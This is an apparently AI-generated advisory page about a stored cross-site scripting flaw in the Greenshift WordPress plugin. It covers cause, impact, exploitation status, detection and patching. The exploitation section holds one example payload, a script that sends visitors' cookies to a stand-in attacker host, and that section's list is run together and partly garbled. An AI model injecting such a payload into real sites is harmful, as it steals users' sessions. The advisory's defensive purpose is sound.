
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-2593 is a Stored Cross-Site Scripting (XSS) vulnerability in the Greenshift – Animation and Page Builder Blocks plugin for WordPress. It affects all versions up to and including 12.8.5, and was published on March 5, 2026. The flaw allows authenticated attackers with Contributor-level access or higher to inject arbitrary web scripts into pages that execute when any user visits the affected page. It carries a CVSS v3.1 base score of 6.4 (Medium) (Wordfence, Red Hat CVE).
The root cause is insufficient input sanitization and output escaping (CWE-79) applied to two specific data points: the _gspb_post_css post meta value and the dynamicAttributes block attribute. An attacker with at least Contributor-level WordPress access can craft malicious content in these fields, which is then stored in the database and rendered unsanitized in page output. Vulnerable code paths have been identified in init.php (lines 2110 and 2138) and blockrender/element/block.php (line 660) of the plugin (Wordfence, WordPress Trac).
Successful exploitation allows an attacker to inject and persistently store malicious JavaScript that executes in the browsers of any user — including administrators — who visit the compromised page. This can lead to session cookie theft, credential harvesting, unauthorized administrative actions (such as creating rogue admin accounts), defacement, or redirection to malicious sites. The changed scope (S:C) in the CVSS vector reflects that the impact extends beyond the attacker's own session to affect other users of the WordPress site (Wordfence).
No public proof-of-concept exploit code or active in-the-wild exploitation has been reported as of the available data. The EPSS score is approximately 0.03%, indicating a low near-term exploitation probability. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires authenticated access at the Contributor level or above, which limits the attack surface compared to unauthenticated vulnerabilities (Wordfence, Red Hat CVE).
_gspb_post_css post meta field to include a malicious <script> payload (e.g., </style><script>document.location='https://attacker.com/steal?c='+document.cookie</script>).dynamicAttributes block attribute of a Greenshift block within the post editor.<script> tags or JavaScript event handlers stored in the _gspb_post_css post meta field or within Greenshift block dynamicAttributes values in the WordPress wp_postmeta or wp_posts tables.wp-admin/post.php or the REST API (/wp-json/wp/v2/posts) from Contributor-level accounts containing encoded script payloads in body parameters./wp-content/plugins/greenshift-animation-and-page-builder-blocks/) that may indicate follow-on compromise.Update the Greenshift – Animation and Page Builder Blocks plugin to version 12.8.6 or later, which addresses the insufficient sanitization and escaping issues. As an interim measure, restrict Contributor-level user registration and review existing Contributor accounts for suspicious post content. Site administrators should audit the _gspb_post_css post meta values and Greenshift block attributes in existing posts for injected scripts. A Web Application Firewall (WAF) with XSS filtering rules can provide additional defense-in-depth while patching is pending (Wordfence, Sucuri Blog).
Wordfence disclosed the vulnerability as part of their standard WordPress plugin threat intelligence reporting, and it was included in Sucuri's March 2026 vulnerability patch roundup, indicating routine coverage within the WordPress security community (Sucuri Blog, Wordfence). No notable researcher commentary, social media controversy, or significant media coverage beyond standard vulnerability aggregation has been observed.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."